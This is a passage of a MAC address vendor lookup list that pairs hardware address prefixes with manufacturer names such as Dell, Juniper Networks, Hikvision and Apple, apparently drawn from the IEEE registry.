Co.,Ltd 904E91E Shenzhen Cloudynamo Internet Technologies Co.,LTD. 904E918 CommandScape, Inc. 189BA52 Airprotec 34298FE ARC Technology Co., Ltd 189BA56 Mantra Softech India Pvt Ltd 904E91A Kaertech Limited 34298F7 Dongguan Kingtron Electronics Tech Co., Ltd 189BA5B Eutron SPA 34008A6 Sithon Technologies SAS 34298F0 BlackEdge Capital 28F537C Matricx Singapore Pte Ltd 34008A1 ZQAM Communications 34008A3 Globex 99 LTD 0CEFAFB Hubei Century Network Technology Co., Ltd 34008A5 Federal Aviation Administration 28F5374 Phyn LLC 28F5372 Unicair Communication Tec Co., Ltd. 78D8000 Kverneland Group Mechatronics 78D8006 Alango Technologies Ltd 7CBACC8 Collinear Networks Inc. 7CBACC0 TGT Limited 7CBACC2 Maco Lighting Pty. Ltd. 78D8002 Shanghai Espacetime Technology Co.,Ltd. 78D8007 NimbeLink Corp F88A3C9 withus F88A3CC EXCETOP TECHNOLOGY (BEIJING) CO., LTD. 4C65A8D Qingping Technology (Beijing) Co., Ltd. A0C5F23 Shenzhen Feima Robotics Technology Co.,Ltd F88A3CD THK Co.,LTD. F023B92 Raysgem Electronics and Technology Co.Ltd 8C147D7 UrbanHello 8C147D3 Remotec Technology Limited 8C147D2 Agilent S.p.A A0C5F25 Spacepath Communications Ltd 8C147D8 V2 S.p.A. A0C5F26 ShenZhen JuWangShi Tech F023B97 Transcend Building Automation control network corporation 60D7E32 Novo innovations Ltd 60D7E39 LongSung Technology (Shanghai) Co.,Ltd. 04714B6 Armstrong Fluid Technology 04714B7 Omylis Pte Ltd 08ED026 SANGO ELECTRONICS CO 08ED023 Jiangsu Logread Network Technology Co., LTD. 08ED025 Vigitron Inc. 08ED024 Fio Corporation 60D7E37 Phase One A/S 98AAFC5 SPM Instrument AB 08ED02A Victiana SRL 98AAFC7 Shenzhen Hubsan Technology Co.,LTD. 1CA0D31 Jabil circuit italia srl A41163A ISE GmbH A411631 INTER CONTROL Hermann Köhler Elektrik GmbH & Co.KG A411634 AlterG, Inc. A41163C Viloc 1CC0E1C Nitto Seiko A411630 Adetel Equipment A411632 Allgo Tech. (Beijing) Co.,Ltd 144FD77 Shenzhen V-Streaming Technology Co., Ltd. A41163E tinylogics 1CA0D3C LYT inc. 1CA0D38 Desarrollos y Soluciones Guinea I+D S.L. 1CA0D3A DSM Messtechnik GmbH 1CA0D3D ERATO (HK) Corporation Limited 58E8766 DivioTec Inc. 807B857 Chendu Ningshui Technology Co.,Ltd 40F3859 Fast Precision Technologies Co. Ltd. 38FDFEC New Garden Co., Ltd. 40F3856 Lennox International Incorporated 50A4D0B ZHENG DIAN ELECTRONICS LIMITED 50A4D01 Beijing ANTVR Technology Co., LTD 50A4D02 Seneco A/S 34049E2 EFD Induction 34049EA i3 International Inc. 40ED988 GUANGZHOU AURIC INTELLIGENT TECHNOLOGY CO.,LTD. 40ED983 Knox Company 40ED984 Kendrion Kuhnke Automation GmbH 50A4D06 PointGrab 34049E7 Pebble Technology 500B911 SPD Development Company Ltd 500B919 Machfu, Inc. 500B915 jiangsu zhongling high-tech CO.,LTD. 500B91A New Audio LLC A4580F2 BLOKS. GmbH A4580F0 INNOPRO 500B91B thumbzup UK Limited 4865EE9 VideoStitch, Inc 4865EEA Shenzhen Inpor cloud Computing Co., Ltd. 4865EEC DNV GL 244E7B8 Cyber1st 7CCBE2A Shanghai Institute of Applied Physics, Chinese Academy of Sciences 4865EE2 CaptionCall AC64DD6 Kpnetworks Ltd. AC64DD0 Jia-Teng AC64DD9 Micro Connect Pty Ltd AC64DD5 SHANGHAI ZTE TECHNOLOGIES CO.,LTD 1CC0E15 Kids Wireless Inc 1CC0E11 Hangzhou Kaierda Electric Welding Machine Co.,Ltd 1CC0E1E Yun Yang Fire Safety Equipment Co.,Ltd. 4CE173A jvi 4CE1732 Lenovo Data Center Group 4CE1737 Ersúles Limited F81D780 Dongguan Shun Hing Plastics Limited F81D786 Zengge Co., Limited 70F8E7E CUAV 383A218 Alicat Scientific 383A21A Foresight Sports 70F8E7D System-on-Chip engineering 70F8E77 NST Technology Limited Co.,Ltd. 70F8E75 Beijing Eehuu Technology Co.,Ltd. 70F8E74 CLIP Inc. 84E0F45 Hangzhou Nationalchip Science & Technology Co.,Ltd. 70F8E7B Photonfocus AG 84E0F44 PetroInTrade 84E0F49 SHENZHEN HCN.ELECTRONICS CO.,LTD. 84E0F4D Logos01 Srl C0D3914 Vernier Software & Technology C0D3910 Fuzhou Jinshi Technology Co.,Ltd. 5CF2869 Shenzhen VST Automotive Electronics Co., LTD C0D3916 Ernitec 58E876E Baoruh Electronic Co., Ltd. 58E8762 Coala Life AB 58E8761 Beijing Perabytes IS Technology Co., Ltd 58E8767 Chronos Technology Ltd. F0ACD7C Simprints Technology Ltd B0C5CA7 SHENZHEN KTC TECHNOLOGY GROUP F0ACD79 U3storage Technologies Co., Ltd 2836382 SHENZHEN GOSPELL SMARTHOME ELECTRONIC CO., LTD. 78CA83D Hubei Boyuan Zhijia Network Media Co. Ltd. 2836383 Sabinetek 8C192DE Elcon AB D0D94FE APPOTRONICS CO., LTD CCD31E7 Shenzhen Decnta Technology Co.,LTD. 8C192D3 Greenfield Technology CCD31E8 inoage GmbH CCD31E5 NTmore.Co.,Ltd C47C8DD Anhui GuangXing Linked-Video Communication Technology Co, Ltd. C47C8D2 Star2Star Communications, LLC 6891D0D Fuzhou x-speed information technology Co.,Ltd. 6891D08 solvimus GmbH E0B6F51 START TODAY CO.,LTD. 6891D0C Spraying Systems Co. E0B6F5B Moog Crossbow 50FF998 Dolphin Concepts Limited 50FF99A metraTec GmbH 986D35E BAYCOM OPTO-ELECTRONICS TECHNOLGY CO., LTD. 986D35A iWave Japan, Inc. 986D352 SHENZHEN FISE TECHNOLOGY HOLDING CO.,LTD. 1007232 Diginet Control Systems Pty Ltd 7C477CB Hangzhou Yiyitaidi Information Technology Co., Ltd. 986D35B INTECH 5CF286B Itron UK Limited 38FDFE1 WAYTONE (BEIIJNG) COMMUNICATIONS CO.,LTD 38FDFE3 Siemens AG, PG IE R&D 38B8EB2 barox Kommunikation GmbH 7C477C2 POWERLAND LIMITED 38B8EB6 MATRIXSTREAM TECHNOLOGIES, INC. 38B8EBD Yellowbrick Data, Inc. 1C8879B gekartel AG 1C88790 Newps co.,ltd 1C8779E ASSYSTEM France 1C8776E Artis GmbH 1C8774E Quest Integrity 1C8879A ITW-FEG 1C87742 Nichigaku 1C8776B Hekatron Vertriebs GmbH 1C87740 Philips Personal Health Solutions 8439BE1 Guangzhou Heygears Technology Ltd 1C87797 TASC Systems Inc. 1C87792 SMARTMOVT TECHNOLOGY Co., LTD 1C87764 RDP.RU 1C8779B Beijing Geedeen Technology Co., Ltd 70886B6 Church & Dwight Co., Inc. 70886B1 Bitfinder Inc 70886B8 Cable Matters Inc. 70886B9 Shenzhen Coolhear Information Technology Co., Ltd. 40A36BC Onion Corporation 40A36B1 TW-TeamWare CC1BE0E Cassia Networks 800A800 Golana Technology (Shenzhen) Co., Ltd. CC1BE0A Matter Labs Pty Ltd A03E6B4 Shenzhen Nufilo Inc. CC1BE01 Beijing Daotongtianxia Co.Ltd. 0055DA9 Quantum Communication Technology Co., Ltd.,Anhui 0055DA6 OOO "DEKATRON" C88ED1D PHOENIX ENGINEERING CORP. C88ED1C Shanghai Bwave Technology Co.,Ltd C88ED17 Ube, Inc. (dba Plum) C88ED15 Fibergate.Inc A03E6BB KoCoS Messtechnik AG 1C21D10 Toyo System CO.,LTD. 1C21D12 Varaani Works Oy DC4427D Rohde&Schwarz Topex SA DC4427E VerifEye Technologies B0C5CAA TEM Mobile Limited B0C5CAB RISECOMM (HK) TECHNOLOGY CO. LIMITED 1C21D16 Wuhan TieChi Detection Technology Co., Ltd. 1C21D17 Soundtrack Your Brand Sweden AB C88ED13 Linx Technologies C88ED14 Comlab AG 1C21D1D Liscotech System Co., Ltd. 1C21D1A LG CNS 1C21D1B Global Design Solutions Ltd B0C5CA2 LOWOTEC GmbH 78C2C05 ShenZhen TuLing Robot CO.,LTD B437D1A Axiomatic Technologies Corporation 74F8DB1 GHL Advanced Technology GmbH & Co. KG 549A11D Hangzhou duotin Technology Co., Ltd. 885D909 Gigatech R&D Corp. 885D906 Hi-Profile Achievement (M) Sdn Bhd 885D901 ShenZhen Yuyangsheng technology company LTD 549A11A VendNovation LLC 807B850 Shiroshita Industrial Co., Ltd. 807B852 Phoenix Co.,Ltd. 64FB811 Narrative AB 64FB81B Sichuan Haige Actec Communication Technology Co.,Ltd. 1CCAE3B Dream Visions Co., LTD 1CCAE3C Gahdeung Elecom 807B858 IDair, LLC 1CCAE36 TOKAI RIKA CO., LTD. 2CD1410 iCIRROUND Inc 90C682A Beijing Acorn Networks Corporation 90C6829 ACT 80E4DAA Neutronics 2CD1413 AOptix Technologies, Inc 1CCAE32 Insigma Inc 80E4DAE Akenori PTE LTD 2CD1418 Minno LLC 90C6821 Shenzhen Photon Broadband Technology CO., LTD 90C6822 ekey biometric systems gmbh 2C6A6FB Schneider Electric Korea 9802D83 Grammer EiA Electronics nv A0BB3EE Messtechnik Sachs GmbH 9802D81 SHENZHEN ATEKO PHOTOELECTRICITY CO LTD 28FD80E T-Radio AS 9802D86 Fritz Kuebler GmbH 28FD803 NUUO, Inc. 2C265F6 Appostar Technology Co. Ltd 2C265F3 shenzhen Clever Electronic Co., Ltd. 2C265F0 XIAMEN VORLINK IOT TECHNOLOGY CO.,LTD. F80278E Lit Technologies 0CEFAF5 PREMIUM SA 0CEFAF2 LUMEL S.A. A44F29E Neotech Systems Pvt. Ltd. 0CEFAF8 BSX Athletics F80278C Technology Research, LLC F802785 Electric Objects F802783 3Shape Holding A/S F802780 Digatron Power Electronics GmbH 3C39E77 Sensor to Image GmbH 100723B Fujian Quanzhou Dong Ang Electronics Co., Ltd. 1007237 nanoTech Co., Ltd. 1007238 Ion Professional Solutions 100723E First Chair Acoustics Co., Ltd. 3C39E7A iiM AG 3C39E79 Zone Controls AB D02212E u::Lux GmbH D022129 UAB "SALDA" D02212B Schleifenbauer Holding BV D022127 Cliptech Industria e Comercio Ltda A44F29D HALLIBURTON 74E14AB Loctek Visual Technology Corp. E81863E Acopian Technical Company D022125 Shanghai Routech Co., Ltd B8D812B Docobo Limited 74E14AD Knog Pty Ltd BC66414 ARGUS-SPECTRUM E4956EB iConservo Inc E4956EA Red Point Positioning, Corp. 74E14A5 UTU Oy E4956E5 ELAN SYSTEMS F40E118 Zeepro Inc. F40E116 Alpha Design Technologies Pvt Ltd B01F81A Steffens Systems GmbH B01F819 CIDE Interactive F40E11B BRADAR INDUSTRIA SA 141FBAD AJIS(DALIAN)co.,LTD 58FCDB6 Timex Group USA Inc 141FBA6 Thales Communications & Security SAS 141FBA5 Inttelix Brasil Tecnologia e Sistemas Ltda BC34008 MATICA TECHNOLOGIES AG BC34009 Shenzhen PHilorise Technical Limited BC34005 NDSL, Inc. BC34002 LifeSmart BC3400D Hangzhou Linker Digital Technology Co., Ltd BC3400E LLD Technology Ltd. BC3400B FARO TECHNOLOGIES, INC. 141FBA0 Shenzhen Mining Technology Co.,Ltd. 7C70BCD mk-messtechnik GmbH 7C70BC6 Bidgely D076503 TAPKO Technologies GmbH D076502 Happo Solutions Oy 7419F86 Baudisch Electronic GmbH 7419F8E Volacomm Co., Ltd D07650C Electro-Motive Diesel A43BFA5 BOI Solutions 7419F80 Marmitek 90F4211 BeEnergy SG GmbH 90F4219 Twunicom Life Tech. Co., Ltd. 90F4212 Catvision Ltd. 90F4218 Mi-Jack Products BC3198A FUJITSU COMPONENT LIMIED BC31983 Shenzhen Qichang Intelligent Technology Co., Ltd. BC3198C Innoflight, Inc. B0FF72C Hopewheel info.Co.,Ltd. BC31981 swiss-sonic Ultraschall AG C86BBCD SCANTECH(HANGZHOU)CO.,LTD C86BBCA Alpha Bridge Technologies Private Limited C86BBC2 Vipaks + Ltd 58C41E0 Guangzhou TeleStar Communication Consulting Service Co., Ltd 68DA73D Sichuan GFS Information Technology Co.Ltd 58C41EE Beijing Qiangyun Innovation Technology Co.,Ltd 58C41E1 JLZTLink Industry ?Shen Zhen?Co., Ltd. 58C41E5 Zhejiang Cainiao Supply Chain Management Co.,Ltd 68DA733 Softronics Ltd 68DA73B Gamber-Johnson LLC 68DA73C Delta Surge Inc. 68DA738 STEL FIBER ELECTRONICS INDIA PRIVATE LIMITED 68DA732 SHENZHEN ALLDOCUBE SCIENCE AND TECHNOLOGY CO., LTD. 10DCB6C BBPOS Limited C8F5D63 BBPOS Limited 50482C3 Immunity Networks and Technologies Pvt Ltd 50482C4 Hy-Line Computer Components GmbH 50482CC Telecam Technology Co.,Ltd 50482C6 WIKA Mobile Conrol GmbH&Co.KG D015BB3 TePS'EG D015BB9 Stellar Blu Solutions D015BBD Lampuga GmbH D015BB0 FORTUNE MARKETING PRIVATE LIMITED D015BB4 Esders GmbH 88A6EF7 TRUWIN 88A6EF0 Energet LLC B4A2EB2 ONX Inc. 40B7FC Phyplus Microelectronics Limited 682C4F leerang corporation 0016F6 Nevion B0D888 Panasonic Automotive Systems Co.,Ltd 782DAD HUAWEI TECHNOLOGIES CO.,LTD D06158 HUAWEI TECHNOLOGIES CO.,LTD FC59C0 Arista Networks 641B2F Samsung Electronics Co.,Ltd 9C73B1 Samsung Electronics Co.,Ltd 388A06 Samsung Electronics Co.,Ltd 244BF1 HUAWEI TECHNOLOGIES CO.,LTD 40ED00 TP-Link Corporation Limited 908855 Cisco Systems, Inc 687161 Cisco Systems, Inc E0A129 Extreme Networks, Inc. 60152B Palo Alto Networks 44D77E Robert Bosch GmbH 883F37 UHTEK CO., LTD. 4893DC UNIWAY INFOCOM PVT LTD 5CE688 VECOS Europe B.V. D4BAFA GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD 28EC22 eero inc. 40D4F6 Honor Device Co., Ltd. 7C3180 SMK corporation 2873F6 Amazon Technologies Inc. C4EBFF zte corporation 843E1D Hui Zhou Gaoshengda Technology Co.,LTD 0080B8 DMG MORI Digital Co., LTD E0CB1D Amazon Technologies Inc. FC84A7 Murata Manufacturing Co., Ltd. 4CEC0F Cisco Systems, Inc 005079 Private 601B52 Vodafone Italia S.p.A. 303180 Shenzhen Skyworth Digital Technology CO., Ltd 3CCB4D Avikus Co., Ltd 201582 Apple, Inc. 40921A Apple, Inc. 10E2C9 Apple, Inc. C08F20 Shenzhen Skyworth Digital Technology CO., Ltd 08FF24 Shenzhen Skyworth Digital Technology CO., Ltd 90B67A Shenzhen Skyworth Digital Technology CO., Ltd 249AC8 Shenzhen Skyworth Digital Technology CO., Ltd 28C01B Shenzhen Skyworth Digital Technology CO., Ltd E028B1 Shenzhen Skyworth Digital Technology CO., Ltd 5C2886 Inventec(Chongqing) Corporation A8C647 Extreme Networks, Inc. 3086F1 Fiberhome Telecommunication Technologies Co.,LTD 0436B8 I&C Technology D0431E Dell Inc. A8881F SERVERCOM (INDIA) PRIVATE LIMITED 24A42C NETIO products a.s. 702F86 Marquardt GmbH F0A0B1 HUAWEI TECHNOLOGIES CO.,LTD 404F42 HUAWEI TECHNOLOGIES CO.,LTD 38A851 Quickset Defense Technologies, LLC 782BCB Dell Inc. 14FEB5 Dell Inc. 180373 Dell Inc. 74867A Dell Inc. 204747 Dell Inc. 000BDB Dell Inc. 00123F Dell Inc. 00CB00 Private 1100AA Private 9C93E4 Private 989096 Dell Inc. 801844 Dell Inc. 9840BB Dell Inc. D481D7 Dell Inc. E0D848 Dell Inc. 002564 Dell Inc. A4BADB Dell Inc. 001C23 Dell Inc. 847BEB Dell Inc. 54BF64 Dell Inc. CCC5E5 Dell Inc. 4CD98F Dell Inc. DCF401 Dell Inc. 6C2B59 Dell Inc. A41F72 Dell Inc. 00C04F Dell Inc. 00B0D0 Dell Inc. 0019B9 Dell Inc. 001AA0 Dell Inc. C8F750 Dell Inc. 98E743 Dell Inc. 185A58 Dell Inc. B44506 Dell Inc. 04BF1B Dell Inc. 485A0D Juniper Networks D08E79 Dell Inc. 581031 Hon Hai Precision IND.CO.,LTD AC919B Wistron Neweb Corporation E03C1C IEEE Registration Authority 000993 Visteon Corporation EC41CA Shenzhen TecAnswer Technology co.,ltd 148477 New H3C Technologies Co., Ltd 14962D New H3C Technologies Co., Ltd FCD749 Amazon Technologies Inc. 0000BC Rockwell Automation 086195 Rockwell Automation 24BBC9 Shenzhen SuperElectron Technology Co.,Ltd. C4A64E Quectel Wireless Solutions Co.,Ltd. 442063 Continental Automotive Technologies GmbH F80DA9 Zyxel Communications Corporation A87116 Earda Technologies co Ltd E8EBDD Guangzhou Qingying Acoustics Technology Co., Ltd 548C81 Hangzhou Hikvision Digital Technology Co.,Ltd. 88B6BD Flaircomm Microelectronics, Inc. 486F33 KYUNGWOO.SYSTEM, INC. D858C6 Katch Asset Tracking Pty Limited 2CC6A0 Lumacron Technology Ltd. 000351 Diebold Nixdorf F09FC2 Ubiquiti Inc 802AA8 Ubiquiti Inc 788A20 Ubiquiti Inc DC07F8 Hangzhou Hikvision Digital Technology Co.,Ltd. 244845 Hangzhou Hikvision Digital Technology Co.,Ltd. 0050CA DZS Inc. 74EE8D Apollo Intelligent Connectivity (Beijing) Technology Co., Ltd. 2428FD Hangzhou Hikvision Digital Technology Co.,Ltd. ACB92F Hangzhou Hikvision Digital Technology Co.,Ltd. D4E853 Hangzhou Hikvision Digital Technology Co.,Ltd. 240F9B Hangzhou Hikvision Digital Technology Co.,Ltd. C06DED Hangzhou Hikvision Digital Technology Co.,Ltd. 2432AE Hangzhou Hikvision Digital Technology Co.,Ltd. E0BAAD Hangzhou Hikvision Digital Technology Co.,Ltd. E0CA3C Hangzhou Hikvision Digital Technology Co.,Ltd. 64DB8B Hangzhou Hikvision Digital Technology Co.,Ltd. 94E1AC Hangzhou Hikvision Digital Technology Co.,Ltd. 5803FB Hangzhou Hikvision Digital Technology Co.,Ltd. 4447CC Hangzhou Hikvision Digital Technology Co.,Ltd. 98DF82 Hangzhou Hikvision Digital Technology Co.,Ltd. ECC89C Hangzhou Hikvision Digital Technology Co.,Ltd. 8CE748 Hangzhou Hikvision Digital Technology Co.,Ltd. 7066B9 Huawei Device Co., Ltd. C4A1AE Huawei Device Co., Ltd. C056E3 Hangzhou Hikvision Digital Technology Co.,Ltd. BCAD28 Hangzhou Hikvision Digital Technology Co.,Ltd. 2C9682 MitraStar Technology Corp. BC49B2 SHENZHEN ALONG COMMUNICATION TECH CO., LTD 9497AE GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD 0CBD75 GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD AC9073 HUAWEI TECHNOLOGIES CO.,LTD FC1D3A HUAWEI TECHNOLOGIES CO.,LTD E4BEFB HUAWEI TECHNOLOGIES CO.,LTD 58F8D7 HUAWEI TECHNOLOGIES CO.,LTD D818D3 Juniper Networks F04B3A Juniper Networks C042D0 Juniper Networks 001BC0 Juniper Networks 44ECCE Juniper Networks CCE194 Juniper Networks E45D37 Juniper Networks 94F7AD Juniper Networks 788CB5 TP-Link Corporation Limited 7483C2 Ubiquiti Inc E063DA Ubiquiti Inc 245A4C Ubiquiti Inc 602232 Ubiquiti Inc E43883 Ubiquiti Inc 288A1C Juniper Networks 84B59C Juniper Networks 5C4527 Juniper Networks EC3EF7 Juniper Networks 204E71 Juniper Networks D404FF Juniper Networks 84C1C1 Juniper Networks 7CE2CA Juniper Networks 40A677 Juniper Networks 002159 Juniper Networks 00239C Juniper Networks 50C58D Juniper Networks 28C0DA Juniper Networks 48814E E&M SOLUTION CO,.Ltd 7C4D8F HP Inc. 9CCBF7 CLOUD STAR TECHNOLOGY CO., LTD. 74D558 GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD F46412 Sony Interactive Entertainment Inc. 3CF9F0 zte corporation 6877DA zte corporation 8858BE kuosheng.com 10C4CA HUMAX Co., Ltd. AC800A Sony Corporation 58C935 Chiun Mai Communication System, Inc 784F9B Juniper Networks 88D98F Juniper Networks 78507C Juniper Networks F07CC7 Juniper Networks 000585 Juniper Networks B8EA98 Xiaomi Communications Co Ltd 889009 Juniper Networks 00CC34 Juniper Networks E030F9 Juniper Networks 4C734F Juniper Networks D45A3F Juniper Networks 04698F Juniper Networks 1C3B62 HMD Global Oy 084218 Asyril SA D85B22 Shenzhen Hohunet Technology Co., Ltd 90B4DD Private 0C2E57 HUAWEI TECHNOLOGIES CO.,LTD E8D775 HUAWEI TECHNOLOGIES CO.,LTD A4A528 Sichuan Tianyi Comheart Telecom Co.,LTD E878EE New H3C Technologies Co., Ltd ECA7AD Barrot Technology Co.,Ltd. 909B6F Apple, Inc. 7473B4 Apple, Inc. A4FC14 Apple, Inc. A81AF1 Apple, Inc. 705846 Trig Avionics Limited 0891A3 Amazon Technologies Inc. 0CD923 GOCLOUD Networks(GAOKE Networks) 84398F Fortinet, Inc. E0DCA0 Siemens Industrial Automation Products Ltd., Chengdu 00302B Inalp Solutions AG F0748D Ruijie Networks Co.,LTD CC08FA Apple, Inc. 980C33 Silicon Laboratories B4EDD5 Quectel Wireless Solutions Co.,Ltd. 2CD1C6 Murata Manufacturing Co., Ltd. 44DBD2 YEALINK(XIAMEN) NETWORK TECHNOLOGY CO.,LTD. 5C64F1 Cisco Systems, Inc 9CDBAF HUAWEI TECHNOLOGIES CO.,LTD B838EF ADVA Optical Networking Ltd. 8C7909 Aruba, a Hewlett Packard Enterprise Company D0D003 Samsung Electronics Co.,Ltd F42462 Selcom Electronics (Shanghai) Co., Ltd F4A17F Marquardt Electronics Technology (Shanghai) Co.Ltd 48BCE1 Samsung Electronics Co.,Ltd F83C80 MITSUMI ELECTRIC CO.,LTD. D83ADD Raspberry Pi Trading Ltd 64EC65 vivo Mobile Communication Co., Ltd. 5C76D5 Nokia 8C7A00 Nokia B85CEE Baidu Online Network Technology (Beijing) Co., Ltd 301F48 zte corporation 28B5E8 Texas Instruments 7CC74A Fiberhome Telecommunication Technologies Co.,LTD 38FC34 Huawei Device Co., Ltd. 3CF692 Huawei Device Co., Ltd. 70F8AE Microsoft Corporation 000F2A Cableware Electronics 2CAB33 Texas Instruments 08C3B3 TCL King Electrical Appliances(Huizhou)Co.,Ltd 204569 ITEL MOBILE LIMITED D46352 Vutility Inc. D821DA SERNET (SUZHOU) TECHNOLOGIES CORPORATION DCAC6F Everytale Inc F41532 PETAiO (NanJing), Inc. BC64D9 GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD 505A65 AzureWave Technology Inc. C4A559 IEEE Registration Authority 6C0C9A Amazon Technologies Inc. A4C7F6 Extreme Networks, Inc. CC00F1 Sagemcom Broadband SAS 940EE7 HUAWEI TECHNOLOGIES CO.,LTD A8B271 HUAWEI TECHNOLOGIES CO.,LTD 6405E4 ALPSALPINE CO,.LTD 308216 Apple, Inc. F04A3D Bosch Thermotechnik GmbH 941FA2 Wuhan YuXin Semiconductor Co., Ltd. 6CD199 vivo Mobile Communication Co., Ltd. A0A001 Aruba, a Hewlett Packard Enterprise Company B49DFD Shenzhen SDMC Technology CO.,Ltd. 8076C2 GD Midea Air-Conditioning Equipment Co.,Ltd. 8CD0B2 Beijing Xiaomi Mobile Software Co., Ltd C4A052 Motorola Mobility LLC, a Lenovo Company BCE8FA GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD 487706 NXP Semiconductor (Tianjin) LTD. 0CCC47 IEEE Registration Authority 5C3E06 Cisco Systems, Inc C828E5 Cisco Systems, Inc F41A9C Xiaomi Communications Co Ltd 001AEB Allied Telesis K.K. DC0682 Accessia Technology Ltd. 44D267 Snorble B0BC7A Harman/Becker Automotive Systems GmbH 84900A Arcadyan Corporation 787689 eero inc. B0FC88 Sagemcom Broadband SAS 0CFC18 HUAWEI TECHNOLOGIES CO.,LTD 10D680 Tendyron Corporation 784946 Cambridge Mobile Telematics, Inc. 34873D Quectel Wireless Solutions Co.,Ltd. C44137 Quectel Wireless Solutions Co.,Ltd. 003E73 Mist Systems, Inc. 08F1B3 Cisco Meraki F44DAD Cable Matters Inc. 80AB4D Nokia Solutions and Networks GmbH & Co. KG 4CBA7D Gemtek Technology Co., Ltd. 500238 Nokia Shanghai Bell Co., Ltd. ACAD4B zte corporation A8169D Hui Zhou Gaoshengda Technology Co.,LTD 203A43 Intel Corporate 3C3B99 ITEL MOBILE LIMITED 1C1A1B Shanghai Sunmi Technology Co.,Ltd. 8038D4 Fibercentury Network Technology Co.,Ltd. 7C296F Apple, Inc. 40EDCF Apple, Inc. F0221D IEEE Registration Authority 9C5440 ChengDu TD Tech 5026EF Murata Manufacturing Co., Ltd. D03957 Liteon Technology Corporation F8F0C5 Suzhou Kuhan Information Technologies Co.,Ltd. F8DE73 HUAWEI TECHNOLOGIES CO.,LTD 80F7A6 Shenzhen C-Data Technology Co., Ltd. 74057C Qorvo International Pte. Ltd. 444988 Intel Corporate FC9189 Sichuan Tianyi Comheart Telecom Co.,LTD 8C986B Apple, Inc. 1C8682 Apple, Inc. 8054E3 Apple, Inc. 102E00 Intel Corporate D009C8 Cisco Systems, Inc D040BE NPO RPS LLC EC1A02 HUAWEI TECHNOLOGIES CO.,LTD FC3357 KAGA FEI Co., Ltd. F8009D INTRACOM DEFENSE S.A. 201642 Microsoft Corporation 48E729 Espressif Inc. E8BAE2 Xplora Technologies AS 90DAF9 Siemens Rail Automation SAU 68418F Telechips, Inc. BC9EBB Nintendo Co.,Ltd 9CDE4D ML vision Co.,LTD 902778 Open Infrastructure E4F14C Private 8407C4 Carrier Corporation C48372 IEEE Registration Authority C0A5E8 Intel Corporate 906584 Intel Corporate 28C5D2 Intel Corporate 5CA06C Realme Chongqing Mobile Telecommunications Corp.,Ltd. A83B76 CLOUD NETWORK TECHNOLOGY SINGAPORE PTE. LTD. 20318D Giax GmbH 3CB07E Arounds Intelligent Equipment Co., Ltd. 8C946A New H3C Technologies Co., Ltd FC1165 Cambium Networks Limited 40E11C shenzhen Cloud High Communication Technology Co.,Ltd 44643C Cisco Systems, Inc 24161B Cisco Systems, Inc 68EE4B Sharetronic Data Technology Co.,Ltd 48C35A LENOVO(BEIJING)CO., LTD. 60706C Google, Inc. C82ADD Google, Inc. 240935 Samsung Electronics Co.,Ltd 842289 Samsung Electronics Co.,Ltd 081AFD Huawei Device Co., Ltd. C0BFAC Huawei Device Co., Ltd. 44272E Huawei Device Co., Ltd. 106650 Robert Bosch JuP1 A80C03 Florawise B4DB91 CELESTICA INC. A8400B Visteon Corporation 08569B WiZ C04E8A HUAWEI TECHNOLOGIES CO.,LTD CC8DB5 Shenzhen SuperElectron Technology Co.,Ltd. ACEE64 Shenzhen SuperElectron Technology Co.,Ltd. 0012F3 u-blox AG 2CB6C8 Raisecom Technology CO., LTD D834D1 Shenzhen Orange Digital Technology Co.,Ltd C461C7 Microsoft Corporation ACCB36 Fiberhome Telecommunication Technologies Co.,LTD 547068 VTech Communications Limited C84052 PAX Computer Technology(Shenzhen) Ltd. FCDF00 GD Midea Air-Conditioning Equipment Co.,Ltd. F01AA0 Aruba, a Hewlett Packard Enterprise Company 5CBBEE zte corporation E8BFDB Inodesign Group 287E80 Hui Zhou Gaoshengda Technology Co.,LTD 0C9F71 Dolphin Electronics (DongGuan) Co., Ltd. 1C8B76 Calix Inc. 2C9452 HUAWEI TECHNOLOGIES CO.,LTD 6001B1 HUAWEI TECHNOLOGIES CO.,LTD 745889 Multilaser Industrial S.A. E8FF98 Huawei Device Co., Ltd. 241551 Huawei Device Co., Ltd. 58957E Huawei Device Co., Ltd. E48C73 Realme Chongqing Mobile Telecommunications Corp.,Ltd. B8144D Apple, Inc. EC28D3 Apple, Inc. 086518 Apple, Inc. 2C57CE Apple, Inc. C404D8 Aviva Links Inc. A044F3 RafaelMicro F42B7D Chipsguide technology CO.,LTD. 8C5219 SHARP Corporation 089115 Amazon Technologies Inc. 84AAA4 SONoC Corp. 883C93 Alcatel-Lucent Enterprise 982044 New H3C Technologies Co., Ltd D8A0E8 zte corporation 80563C ZF 909877 Vestel Elektronik San ve Tic. A.S. AC965B Lucid Motors D0066A Cornelis Networks, Inc. 883CC5 IEEE Registration Authority 2C9E00 Sony Interactive Entertainment Inc. DC6AE7 Xiaomi Communications Co Ltd 7CA449 Xiaomi Communications Co Ltd 80398C Samsung Electronics Co.,Ltd 980D6F Samsung Electronics Co.,Ltd 1C90FF Tuya Smart Inc. 10823D Ruijie Networks Co.,LTD BCD767 BAE Systems Apllied Intelligence EC1D9E Quectel Wireless Solutions Co.,Ltd. 74D423 Amazon Technologies Inc. E04735 Ericsson AB 2C691D IEEE Registration Authority E0EF02 Chengdu Quanjing Intelligent Technology Co.,Ltd 4CA3A7 TECNO MOBILE LIMITED B067B5 Apple, Inc. 5C5284 Apple, Inc. C0956D Apple, Inc. 3C39C8 Apple, Inc. 900A62 Inventus Power Eletronica do Brasil LTDA 0443FD Sichuan Tianyi Comheart Telecom Co.,LTD A4897E Guangzhou Yuhong Technology Co.,Ltd. ECA138 Amazon Technologies Inc. A8ABB5 Apple, Inc. 5864C4 Apple, Inc. 40A53B Nokia 74803F Renesas Electronics (Penang) Sdn. Bhd. 209CB4 Aruba, a Hewlett Packard Enterprise Company E051D8 China Dragon Technology Limited E8CC8C Chengdu Jiarui Hualian Communication Technology Co E46564 SHENZHEN KTC TECHNOLOGY CO.,LTD 505FB5 ASKEY COMPUTER CORP 88DE7C ASKEY COMPUTER CORP 045747 GoPro 481CB9 SZ DJI TECHNOLOGY CO.,LTD 3CA7AE zte corporation AC3184 Huawei Device Co., Ltd. 503F50 Huawei Device Co., Ltd. 081A1E Shenzhen iComm Semiconductor CO.,LTD 80646F Espressif Inc. 5C60BA HP 